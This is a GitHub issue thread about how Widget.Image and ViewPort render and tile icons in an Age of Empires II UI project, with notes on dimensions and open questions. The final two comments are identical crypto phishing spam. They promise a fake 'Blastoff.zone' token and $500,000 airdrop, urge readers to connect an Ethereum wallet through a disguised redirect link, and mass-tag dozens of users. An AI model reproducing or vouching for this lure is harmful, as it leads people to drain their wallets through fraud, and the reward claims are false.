### ISSUE TITLE
Investigate how `Widget.Image` should be used to render materials

### ISSUE THREAD

**Issue by with-heart** [with-heart/aoe2-ui#38]
So far I haven't taken into account `Image` but it appears that we need to in order to accurately render the UI.

As an example, here's how the `SpectatorsIcon` is rendered currently:

<img width="238" alt="image" src="https://github.com/with-heart/aoe2-ui/assets/1954752/8c6bf246-9866-42fd-b060-79c9f4725b39">

If we hover over its container, we can see that it's being centered within it but is still being tiled:

<img width="396" alt="image" src="https://github.com/with-heart/aoe2-ui/assets/1954752/a64c7466-1db4-4974-b9d5-5b848d2d9dd0">

# Details

Here are some notes about `SpectatorsIcon` specifically that should help us figure out what's going on here:

- `textures/menu/icons/spectators_icon.png`
   ```json
   {
     "width": 80,
     "height": 52
   }
   ```
- `Widget.ViewPort`
   ```json
   {
     "width": 500,
     "height": 49,
     "xorigin": 0,
     "yorigin": 64,
     "alignment": "TopLeft"
   }
   ```
- `Widget.Image`
   ```json
   {
     "width": 48,
     "height": 32,
     "xorigin": 0,
     "yorigin": 2,
     "alignment": "TopLeft"
   }
   ```

# Questions to answer

- [ ] does `Image` with dimensions that don't match the actual image resize it?

   It appears that it might resize the image. The aspect ratio of the `.png` is `0.65` while the aspect ratio of `Image` is `0.66667` which isn't too far off. We need to test this to be sure.

- [ ] how do `ViewPort` and `Image` work in tandem? is `Image` a new container?
- [ ] how does the image size, `ViewPort`, and `Image` work in tandem?

**Comment by with-heart** [comment]
I created a sandbox to play around with this stuff here: https://codesandbox.io/p/sandbox/charming-microservice-mnl66s?file=%2Fsrc%2Fui.tsx%3A104%2C35

Still not sure I have an answer to any of the questions yet but I'm getting somewhere at least.

**Comment by with-heart** [comment]
Note to self: `textures.json` should probably only be used for `defs`. Rendering the `svg` might only involve `ViewPort`/`Image`.

**Comment by vishalyadav98** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
yanboishere, @JBoku8, @mnichangxin, @kingli-crypto, @kennethwwu, @bhuisoubik, @Baashterd, @dreamerate, @thomasschulze, @devSajan, @ebankie, @jawang94, @yangyuan6, @dipaksaraf, @foaadnami, @mansamusai, @doconchain, @local-h0st, @outlookdrain177, @asd890303, @ehsqjfwk99999, @BritBratt35, @oantoro, @0xJuancito, @Joetoledano, @haorui, @yosuzzy, @jlyu26, @williamkhepri, @alxisk, @UrbsKali, @camerongamble36, @DanielPetelin, @sleep-go, @MehulATL, @heycn, @treadmoon, @sokolegg, @aliashraficrypto, @auroralabs, @bombillazo, @TsHristov, @ashleanichols, @CaptainEboy, @connorads, @sebastiaan-dev, @PupilCrusher, @duoshou98, @naman312010, @iamsivin

**Comment by iamcameronwatson** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
dlgchg, @kankk, @0802lqrasd123, @abhayptp, @niuyi1017, @renatrazumov, @rootslab, @hughpu, @satinP, @intellectb, @IsenTang, @Drinkler, @yiyaoi, @JinJieTan, @yhaostone, @Shik1997, @z3bg, @dennis-gonzales, @lvnam96, @rosejim295, @phanib, @AdelDima, @lcdss, @alexbrothman, @typhoonese, @startprojekt, @epirus, @ydhnwb, @blackstoneblackstone, @yshdzw, @jaywcjlove, @taufikrahman29, @antx-code, @KrasniqiR, @orpheuslummis, @DavidSolomon22, @gauthamzz, @bitlel, @kaiser-9527, @dmtrki, @syukronarie, @lovemefan, @khoerling, @gblejman, @Asim-Tahir, @gaokaikai, @zacone, @rpominov, @sam-hansen, @ZhuBoyang
